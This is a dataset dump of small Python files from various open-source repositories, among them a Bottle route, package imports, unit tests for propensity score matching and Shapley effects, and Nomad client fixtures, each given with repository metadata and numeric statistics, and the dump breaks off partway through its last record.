| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
38baa8a87a575ca2852236139d9dd9eb0d35391a
| 185
|
py
|
Python
|
routes/index.py
|
Murtagy/Pyfile
|
10ea0bf1f16c1fb83548aaf3b8b1cab3a23e757a
|
[
"MIT"
] | null | null | null |
routes/index.py
|
Murtagy/Pyfile
|
10ea0bf1f16c1fb83548aaf3b8b1cab3a23e757a
|
[
"MIT"
] | null | null | null |
routes/index.py
|
Murtagy/Pyfile
|
10ea0bf1f16c1fb83548aaf3b8b1cab3a23e757a
|
[
"MIT"
] | null | null | null |
from main.app import app
from .security import check_login
import bottle
# BASIC FILE MANAGEMENT
@app.route('/')
@check_login
def index():
return bottle.template('main', path='.')
| 20.555556
| 44
| 0.72973
| 26
| 185
| 5.115385
| 0.653846
| 0.150376
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140541
| 185
| 9
| 44
| 20.555556
| 0.836478
| 0.113514
| 0
| 0
| 0
| 0
| 0.037037
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| true
| 0
| 0.428571
| 0.142857
| 0.714286
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
38db39729061d8be28852a85238397c67d792ed8
| 28
|
py
|
Python
|
src/herbpy/__init__.py
|
personalrobotics/herbpy
|
ab48e9190b061759b31bc9c879a7f96a51d975f5
|
[
"BSD-3-Clause"
] | 4
|
2017-03-04T06:18:21.000Z
|
2019-01-04T08:03:41.000Z
|
src/herbpy/__init__.py
|
personalrobotics/herbpy
|
ab48e9190b061759b31bc9c879a7f96a51d975f5
|
[
"BSD-3-Clause"
] | 87
|
2015-01-30T03:50:35.000Z
|
2017-02-20T18:55:42.000Z
|
src/herbpy/__init__.py
|
personalrobotics/herbpy
|
ab48e9190b061759b31bc9c879a7f96a51d975f5
|
[
"BSD-3-Clause"
] | 10
|
2015-07-29T13:13:05.000Z
|
2019-02-13T22:11:24.000Z
|
from herb import initialize
| 14
| 27
| 0.857143
| 4
| 28
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 28
| 1
| 28
| 28
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c7f7fba59521e3c4677259d18fa1fb6099fb793b
| 12,270
|
py
|
Python
|
PropensityScoreMatching/tests/tests_matchclass.py
|
aegorenkov/PropensityScoreMatching
|
ad7b6954916a07b0f863f394787d2702ebad4b5f
|
[
"MIT"
] | 2
|
2018-06-05T15:17:23.000Z
|
2021-01-08T08:55:43.000Z
|
PropensityScoreMatching/tests/tests_matchclass.py
|
aegorenkov/PropensityScoreMatching
|
ad7b6954916a07b0f863f394787d2702ebad4b5f
|
[
"MIT"
] | null | null | null |
PropensityScoreMatching/tests/tests_matchclass.py
|
aegorenkov/PropensityScoreMatching
|
ad7b6954916a07b0f863f394787d2702ebad4b5f
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Mon May 18 14:30:15 2015
@author: Alexander
"""
import unittest
import PropensityScoreMatching as PSM
import pandas as pd
import numpy as np
import os
LOCAL_DIR = os.path.dirname(__file__)
FILENAMES = [os.path.join('results', 'nsw_all_random1_pscoresimple.csv'),
os.path.join('results', 'nsw_all_random2_pscoresimple.csv'),
os.path.join('results', 'nsw_all_random3_pscoresimple.csv')]
FILEPATHS = [os.path.join(LOCAL_DIR, name) for name in FILENAMES]
DATASET1 = pd.read_csv(FILEPATHS[0])
DATASET2 = pd.read_csv(FILEPATHS[1])
DATASET3 = pd.read_csv(FILEPATHS[2])
class MatchClass(unittest.TestCase):
#We don't define setUp because we will need to change parameters of the
#match instance
def test_match_can_initialize(self):
match = PSM.Match()
self.assertEqual(match.match_type, 'neighbor')
def test_set1_idlist_is_same_length_as_data(self):
testdata = DATASET1.sort(columns="_id", )
match = PSM.Match()
id_list = match.match(testdata["Treated"], testdata["_pscore"])
self.assertTrue(len(id_list) == len(DATASET1["_n1"]),
msg="List of matches has incorrect length")
def test_set1_matches_in_order(self):
testdata = DATASET1
match = PSM.Match()
id_list = match.match(testdata["Treated"], testdata["_pscore"])
test_list, true_list = testdata["_id"][id_list], testdata["_n1"]
#Raise assertionError if id_list cannot match the order if id and n1
np.testing.assert_array_equal(test_list, true_list)
#Explicitly test matching without nan values
test_list = test_list[np.isfinite(test_list)]
true_list = true_list[np.isfinite(true_list)]
self.assertTrue(np.array_equal(test_list, true_list))
def test_set2_matches_in_order(self):
testdata = DATASET2
match = PSM.Match()
id_list = match.match(testdata["Treated"], testdata["_pscore"])
test_list, true_list = testdata["_id"][id_list], testdata["_n1"]
#Raise assertionError if id_list cannot match the order if id and n1
np.testing.assert_array_equal(test_list, true_list)
#Explicitly test matching without nan values
test_list = test_list[np.isfinite(test_list)]
true_list = true_list[np.isfinite(true_list)]
self.assertTrue(np.array_equal(test_list, true_list))
def test_set3_matches_in_order(self):
testdata = DATASET3
match = PSM.Match()
id_list = match.match(testdata["Treated"], testdata["_pscore"])
test_list, true_list = testdata["_id"][id_list], testdata["_n1"]
#Raise assertionError if id_list cannot match the order if id and n1
np.testing.assert_array_equal(test_list, true_list)
#Explicitly test matching without nan values
test_list = test_list[np.isfinite(test_list)]
true_list = true_list[np.isfinite(true_list)]
self.assertTrue(np.array_equal(test_list, true_list))
class PropensityScoreMatchingClass(unittest.TestCase):
#We don't define setUp because we will need to change parameters of the
#psm instance
@staticmethod
def load_data(dataset, key_range):
treated = dataset['Treated']
names = dataset.keys()[key_range]
design_matrix = dataset[names]
design_matrix['Intercept'] = 1
return (treated, design_matrix)
def test_psm_can_initialize(self):
psm = PSM.StatisticalMatching()
self.assertEqual(psm.model, 'logit')
def test_set1_pscores_should_equal_data_pscores(self):
treated, design_matrix = self.load_data(DATASET1, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
pscore_fit = psm.pscore
pscore_actual = DATASET1['_pscore']
mean_diff = np.mean(np.abs(pscore_fit-pscore_actual))
self.assertAlmostEqual(mean_diff, 0)
def test_set2_pscores_should_equal_data_pscores(self):
treated, design_matrix = self.load_data(DATASET2, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
pscore_fit = psm.pscore
pscore_actual = DATASET2['_pscore']
mean_diff = np.mean(np.abs(pscore_fit-pscore_actual))
self.assertAlmostEqual(mean_diff, 0)
def test_set3_pscores_should_equal_data_pscores(self):
treated, design_matrix = self.load_data(DATASET3, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
pscore_fit = psm.pscore
pscore_actual = DATASET3['_pscore']
mean_diff = np.mean(np.abs(pscore_fit-pscore_actual))
self.assertAlmostEqual(mean_diff, 0)
def test_set1_matches_should_equal_actual_matches(self):
treated, design_matrix = self.load_data(DATASET1, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
id_list = psm.matches
test_list, true_list = DATASET1["_id"][id_list], DATASET1["_n1"]
#Raise assertionError if id_list cannot match the order if id and n1
np.testing.assert_array_equal(test_list, true_list)
#Explicitly test matching without nan values
test_list = test_list[np.isfinite(test_list)]
true_list = true_list[np.isfinite(true_list)]
self.assertTrue(np.array_equal(test_list, true_list))
def test_set2_matches_should_equal_actual_matches(self):
treated, design_matrix = self.load_data(DATASET2, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
id_list = psm.matches
test_list, true_list = DATASET2["_id"][id_list], DATASET2["_n1"]
#Raise assertionError if id_list cannot match the order if id and n1
np.testing.assert_array_equal(test_list, true_list)
#Explicitly test matching without nan values
test_list = test_list[np.isfinite(test_list)]
true_list = true_list[np.isfinite(true_list)]
self.assertTrue(np.array_equal(test_list, true_list))
def test_set3_matches_should_equal_actual_matches(self):
treated, design_matrix = self.load_data(DATASET3, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
id_list = psm.matches
test_list, true_list = DATASET3["_id"][id_list], DATASET3["_n1"]
#Raise assertionError if id_list cannot match the order if id and n1
np.testing.assert_array_equal(test_list, true_list)
#Explicitly test matching without nan values
test_list = test_list[np.isfinite(test_list)]
true_list = true_list[np.isfinite(true_list)]
self.assertTrue(np.array_equal(test_list, true_list))
def test_set1_unmatched_treated_mean_should_equal_6349(self):
treated, design_matrix = self.load_data(DATASET1, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET1['RE78'])
res = psm.unmatched_treated_mean
self.assertAlmostEqual(res, 6349.1435, places=4)
def test_set1_matched_treated_mean_should_equal_6349(self):
treated, design_matrix = self.load_data(DATASET1, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET1['RE78'])
res = psm.matched_treated_mean
self.assertAlmostEqual(res, 6349.1435, places=4)
def test_set1_unmatched_control_mean_should_equal_4554(self):
treated, design_matrix = self.load_data(DATASET1, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET1['RE78'])
res = psm.unmatched_control_mean
self.assertAlmostEqual(res, 4554.80112, places=4)
def test_set1_matched_control_mean_should_equal_5341(self):
treated, design_matrix = self.load_data(DATASET1, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET1['RE78'])
res = psm.matched_control_mean
self.assertAlmostEqual(res, 5341.43016, places=4)
def test_set1_ATT_should_equal_1007(self):
treated, design_matrix = self.load_data(DATASET1, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET1['RE78'])
res = psm.att
self.assertAlmostEqual(res, 1007.71335, places=4)
def test_set2_unmatched_treated_mean_should_equal_6349(self):
treated, design_matrix = self.load_data(DATASET2, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET2['RE78'])
res = psm.unmatched_treated_mean
self.assertAlmostEqual(res, 6349.1435, places=4)
def test_set2_matched_treated_mean_should_equal_6349(self):
treated, design_matrix = self.load_data(DATASET2, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET2['RE78'])
res = psm.matched_treated_mean
self.assertAlmostEqual(res, 6349.1435, places=4)
def test_set2_unmatched_control_mean_should_equal_4554(self):
treated, design_matrix = self.load_data(DATASET2, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET2['RE78'])
res = psm.unmatched_control_mean
self.assertAlmostEqual(res, 4554.80112, places=4)
def test_set2_matched_control_mean_should_equal_3397(self):
treated, design_matrix = self.load_data(DATASET2, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET2['RE78'])
res = psm.matched_control_mean
self.assertAlmostEqual(res, 3397.68807, places=4)
def test_set2_ATT_should_equal_2951(self):
treated, design_matrix = self.load_data(DATASET2, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET2['RE78'])
res = psm.att
self.assertAlmostEqual(res, 2951.45543, places=4)
def test_set3_unmatched_treated_mean_should_equal_6349(self):
treated, design_matrix = self.load_data(DATASET3, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET3['RE78'])
res = psm.unmatched_treated_mean
self.assertAlmostEqual(res, 6349.1435, places=4)
def test_set3_matched_treated_mean_should_equal_6349(self):
treated, design_matrix = self.load_data(DATASET3, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET3['RE78'])
res = psm.matched_treated_mean
self.assertAlmostEqual(res, 6349.1435, places=4)
def test_set3_unmatched_control_mean_should_equal_4554(self):
treated, design_matrix = self.load_data(DATASET3, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET3['RE78'])
res = psm.unmatched_control_mean
self.assertAlmostEqual(res, 4554.80112, places=4)
def test_set3_matched_control_mean_should_equal_4148(self):
treated, design_matrix = self.load_data(DATASET3, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET3['RE78'])
res = psm.matched_control_mean
self.assertAlmostEqual(res, 4148.65249, places=4)
def test_set3_ATT_should_equal_2200(self):
treated, design_matrix = self.load_data(DATASET3, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET3['RE78'])
res = psm.att
self.assertAlmostEqual(res, 2200.49101, places=4)
class TestMahalanobisMatchingClass(unittest.TestCase):
pass
if __name__ == '__main__':
unittest.main()
| 40.629139
| 76
| 0.678566
| 1,563
| 12,270
| 5.052463
| 0.105566
| 0.06838
| 0.103457
| 0.048626
| 0.845258
| 0.821958
| 0.810308
| 0.800051
| 0.790427
| 0.777131
| 0
| 0.038478
| 0.218419
| 12,270
| 301
| 77
| 40.76412
| 0.784984
| 0.073676
| 0
| 0.698347
| 0
| 0
| 0.032534
| 0.008464
| 0
| 0
| 0
| 0
| 0.136364
| 1
| 0.115702
| false
| 0.004132
| 0.020661
| 0
| 0.152893
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2a1fc1791271eed5769d9f3cb90ad79b8bec9d3b
| 3,561
|
py
|
Python
|
econsa/tests/test_shapley.py
|
OpenSourceEconomics/econsa
|
bb591c1382c97f65d557513c5cfb3febff0e0821
|
[
"MIT"
] | 3
|
2020-07-17T15:05:52.000Z
|
2020-10-23T06:21:13.000Z
|
econsa/tests/test_shapley.py
|
OpenSourceEconomics/econsa
|
bb591c1382c97f65d557513c5cfb3febff0e0821
|
[
"MIT"
] | 65
|
2020-05-14T13:36:12.000Z
|
2021-06-22T15:45:15.000Z
|
econsa/tests/test_shapley.py
|
OpenSourceEconomics/econsa
|
bb591c1382c97f65d557513c5cfb3febff0e0821
|
[
"MIT"
] | 4
|
2020-07-15T13:51:52.000Z
|
2021-08-31T06:58:33.000Z
|
"""Tests for the Shapley effects.
This module contains all tests for th Shapley effects.
"""
import chaospy as cp
import numpy as np
import pandas as pd
from numpy.testing import assert_array_almost_equal as aaae
from econsa.shapley import _r_condmvn
from econsa.shapley import get_shapley
def test_get_shapley_exact():
def gaussian_model(x):
return np.sum(x, 1)
def x_all(n):
distribution = cp.MvNormal(mean, cov)
return distribution.sample(n)
def x_cond(n, subset_j, subsetj_conditional, xjc):
if subsetj_conditional is None:
cov_int = np.array(cov)
cov_int = cov_int.take(subset_j, axis=1)
cov_int = cov_int[subset_j]
distribution = cp.MvNormal(mean[subset_j], cov_int)
return distribution.sample(n)
else:
return _r_condmvn(
n,
mean=mean,
cov=cov,
dependent_ind=subset_j,
given_ind=subsetj_conditional,
x_given=xjc,
)
np.random.seed(123)
n_inputs = 3
mean = np.zeros(3)
cov = np.array([[1.0, 0, 0], [0, 1.0, 1.8], [0, 1.8, 4.0]])
method = "exact"
n_perms = None
n_output = 10 ** 4
n_outer = 10 ** 3
n_inner = 10 ** 2
col = ["X" + str(i) for i in np.arange(n_inputs) + 1]
names = ["Shapley effects", "std. errors", "CI_min", "CI_max"]
expected = pd.DataFrame(
data=[
[0.101309, 0.418989, 0.479701],
[0.00241549, 0.16297, 0.163071],
[0.096575, 0.0995681, 0.160083],
[0.106044, 0.73841, 0.79932],
],
index=names,
columns=col,
).T
calculated = get_shapley(
method,
gaussian_model,
x_all,
x_cond,
n_perms,
n_inputs,
n_output,
n_outer,
n_inner,
)
aaae(calculated, expected)
def test_get_shapley_random():
def gaussian_model(x):
return np.sum(x, 1)
def x_all(n):
distribution = cp.MvNormal(mean, cov)
return distribution.sample(n)
def x_cond(n, subset_j, subsetj_conditional, xjc):
if subsetj_conditional is None:
cov_int = np.array(cov)
cov_int = cov_int.take(subset_j, axis=1)
cov_int = cov_int[subset_j]
distribution = cp.MvNormal(mean[subset_j], cov_int)
return distribution.sample(n)
else:
return _r_condmvn(
n,
mean=mean,
cov=cov,
dependent_ind=subset_j,
given_ind=subsetj_conditional,
x_given=xjc,
)
np.random.seed(123)
n_inputs = 3
mean = np.zeros(3)
cov = np.array([[1.0, 0, 0], [0, 1.0, 1.8], [0, 1.8, 4.0]])
method = "random"
n_perms = 30000
n_output = 10 ** 4
n_outer = 1
n_inner = 3
col = ["X" + str(i) for i in np.arange(n_inputs) + 1]
names = ["Shapley effects", "std. errors", "CI_min", "CI_max"]
expected = pd.DataFrame(
data=[
[0.107543, 0.414763, 0.477694],
[0.00307984, 0.0032332, 0.0031896],
[0.101507, 0.408426, 0.471442],
[0.11358, 0.4211, 0.483945],
],
index=names,
columns=col,
).T
calculated = get_shapley(
method,
gaussian_model,
x_all,
x_cond,
n_perms,
n_inputs,
n_output,
n_outer,
n_inner,
)
aaae(calculated, expected)
| 25.255319
| 66
| 0.538051
| 476
| 3,561
| 3.836134
| 0.25
| 0.03943
| 0.030668
| 0.056955
| 0.728368
| 0.728368
| 0.710843
| 0.710843
| 0.710843
| 0.710843
| 0
| 0.099957
| 0.348217
| 3,561
| 140
| 67
| 25.435714
| 0.686773
| 0.024151
| 0
| 0.758621
| 0
| 0
| 0.025671
| 0
| 0
| 0
| 0
| 0
| 0.008621
| 1
| 0.068966
| false
| 0
| 0.051724
| 0.017241
| 0.189655
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2a529fe357d7ea56a228bd2f73708cbfff3d08db
| 94
|
py
|
Python
|
deepcarskit/quick_start/__init__.py
|
irecsys/DeepCARSKit
|
20b861728efa0b416075d2e26c102c509923848e
|
[
"MIT"
] | null | null | null |
deepcarskit/quick_start/__init__.py
|
irecsys/DeepCARSKit
|
20b861728efa0b416075d2e26c102c509923848e
|
[
"MIT"
] | null | null | null |
deepcarskit/quick_start/__init__.py
|
irecsys/DeepCARSKit
|
20b861728efa0b416075d2e26c102c509923848e
|
[
"MIT"
] | 1
|
2022-03-23T07:02:59.000Z
|
2022-03-23T07:02:59.000Z
|
from deepcarskit.quick_start.quick_start import run, objective_function, load_data_and_model
| 31.333333
| 92
| 0.882979
| 14
| 94
| 5.5
| 0.857143
| 0.25974
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074468
| 94
| 2
| 93
| 47
| 0.885057
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2a617b9090b36dcb9ce0cc99372870093ff5228c
| 109
|
py
|
Python
|
roppylib/libformatstr/__init__.py
|
D4mianWayne/roppy
|
fa596f242f0ed05d1fb0ea8c0addb7af3eb010ca
|
[
"MIT"
] | 25
|
2020-04-15T14:12:15.000Z
|
2022-02-23T01:54:20.000Z
|
roppy/libformatstr/__init__.py
|
bee-san/roppy
|
8c957fd4a49f8f4ffdcc539ced17a63e12a0dd10
|
[
"MIT"
] | 1
|
2020-08-15T07:24:01.000Z
|
2020-08-15T07:24:01.000Z
|
roppy/libformatstr/__init__.py
|
bee-san/roppy
|
8c957fd4a49f8f4ffdcc539ced17a63e12a0dd10
|
[
"MIT"
] | 6
|
2020-07-06T01:10:34.000Z
|
2021-11-17T06:23:57.000Z
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from .core import *
from .pattern import *
from .guess import *
| 15.571429
| 22
| 0.651376
| 16
| 109
| 4.4375
| 0.75
| 0.28169
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010989
| 0.165138
| 109
| 6
| 23
| 18.166667
| 0.769231
| 0.366972
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2a658f3b0f5e67c73acb3a9789de0e2469b7bac6
| 137
|
py
|
Python
|
src/middleware/__init__.py
|
kenoseni/Flight-Booking
|
ce67113dbf303a155274e02aa520d4d116197b9d
|
[
"MIT"
] | null | null | null |
src/middleware/__init__.py
|
kenoseni/Flight-Booking
|
ce67113dbf303a155274e02aa520d4d116197b9d
|
[
"MIT"
] | null | null | null |
src/middleware/__init__.py
|
kenoseni/Flight-Booking
|
ce67113dbf303a155274e02aa520d4d116197b9d
|
[
"MIT"
] | null | null | null |
"""Module that inports geenrate token function"""
from .generate_tokens import generate_token
from .token_required import token_required
| 34.25
| 49
| 0.839416
| 18
| 137
| 6.166667
| 0.611111
| 0.234234
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10219
| 137
| 3
| 50
| 45.666667
| 0.902439
| 0.313869
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
aa7a05085fd4b69eab3b983bb7b13b2be5804e29
| 93
|
py
|
Python
|
tests/test_converters.py
|
tobyqin/pyhandy
|
8852259ec73816da7ba982cdc56c7a023ede57a3
|
[
"MIT"
] | null | null | null |
tests/test_converters.py
|
tobyqin/pyhandy
|
8852259ec73816da7ba982cdc56c7a023ede57a3
|
[
"MIT"
] | null | null | null |
tests/test_converters.py
|
tobyqin/pyhandy
|
8852259ec73816da7ba982cdc56c7a023ede57a3
|
[
"MIT"
] | null | null | null |
from eztools import converters
def test_to_int():
assert converters.to_int(123) == 123
| 15.5
| 40
| 0.741935
| 14
| 93
| 4.714286
| 0.714286
| 0.151515
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077922
| 0.172043
| 93
| 5
| 41
| 18.6
| 0.779221
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
aa8c27e1236ad488c196943a5f01fa30173680d2
| 824
|
py
|
Python
|
tests/conftest.py
|
i4s-pserrano/python-nomad
|
0f8dd9dfa1d448465be490f0acf9f5df96cd893f
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
i4s-pserrano/python-nomad
|
0f8dd9dfa1d448465be490f0acf9f5df96cd893f
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
i4s-pserrano/python-nomad
|
0f8dd9dfa1d448465be490f0acf9f5df96cd893f
|
[
"MIT"
] | null | null | null |
import nomad
import pytest
import tests.common as common
@pytest.fixture
def nomad_setup():
n = nomad.Nomad(host=common.IP, port=common.NOMAD_PORT, verify=False, token=common.NOMAD_TOKEN)
return n
@pytest.fixture
def nomad_setup_with_namespace():
n = nomad.Nomad(host=common.IP, port=common.NOMAD_PORT, verify=False, token=common.NOMAD_TOKEN, namespace=common.NOMAD_NAMESPACE)
return n
@pytest.fixture
def nomad_setup_vault_valid_token():
n = nomad.Nomad(host=common.IP, port=common.NOMAD_PORT, verify=False, token=common.NOMAD_TOKEN, vaulttoken=common.VAULT_POLICY_TOKEN)
return n
@pytest.fixture
def nomad_setup_vault_invalid_token():
n = nomad.Nomad(host=common.IP, port=common.NOMAD_PORT, verify=False, token=common.NOMAD_TOKEN, vaulttoken=common.VAULT_POLICY_INVALID_TOKEN)
return n
| 34.333333
| 145
| 0.785194
| 124
| 824
| 5.008065
| 0.193548
| 0.15942
| 0.10306
| 0.135266
| 0.805153
| 0.763285
| 0.763285
| 0.763285
| 0.57971
| 0.57971
| 0
| 0
| 0.110437
| 824
| 23
| 146
| 35.826087
| 0.847203
| 0
| 0
| 0.421053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.210526
| false
| 0
| 0.157895
| 0
| 0.578947
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
6321f527ee0be728886bfa042df30cbd964ca5e6
| 154
|
py
|
Python
|
molmodmt/forms/classes/get/api_get_parmed_GromacsTopologyFile.py
|
LMMV/MolModMT
|
5725d6d5627b07edcbbd5e55318345a136b28c35
|
[
"MIT"
] | null | null | null |
molmodmt/forms/classes/get/api_get_parmed_GromacsTopologyFile.py
|
LMMV/MolModMT
|
5725d6d5627b07edcbbd5e55318345a136b28c35
|
[
"MIT"
] | null | null | null |
molmodmt/forms/classes/get/api_get_parmed_GromacsTopologyFile.py
|
LMMV/MolModMT
|
5725d6d5627b07edcbbd5e55318345a136b28c35
|
[
"MIT"
] | null | null | null |
def getting(item, atom_indices=None, **kwargs):
from .api_get_parmed_Structure import getting as _get
return _get(item, atom_indices, **kwargs)
| 25.666667
| 57
| 0.746753
| 22
| 154
| 4.909091
| 0.681818
| 0.148148
| 0.277778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155844
| 154
| 5
| 58
| 30.8
| 0.830769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2dae563b6663226520de5be991033361629f8f67
| 29
|
py
|
Python
|
midca/modules/_goalgen/goalgen/__init__.py
|
Heider1632/midca
|
ff61e1b291ae9a3aa784c75b4069f91884e26b2c
|
[
"MIT"
] | null | null | null |
midca/modules/_goalgen/goalgen/__init__.py
|
Heider1632/midca
|
ff61e1b291ae9a3aa784c75b4069f91884e26b2c
|
[
"MIT"
] | null | null | null |
midca/modules/_goalgen/goalgen/__init__.py
|
Heider1632/midca
|
ff61e1b291ae9a3aa784c75b4069f91884e26b2c
|
[
"MIT"
] | null | null | null |
import gengoal, goal, goalorg
| 29
| 29
| 0.827586
| 4
| 29
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 29
| 1
| 29
| 29
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
937a0377fb321e20e731ae57a004fb1927ed2c6d
| 30,094
|
py
|
Python
|
tests/test_models.py
|
DeveloperCielo/python-cielo-webservice
|
b40dc6a3b06d804e89751ef45ce8dc58d0f155aa
|
[
"MIT"
] | 3
|
2016-09-09T12:48:38.000Z
|
2020-03-09T20:53:59.000Z
|
tests/test_models.py
|
DeveloperCielo/python-cielo-webservice
|
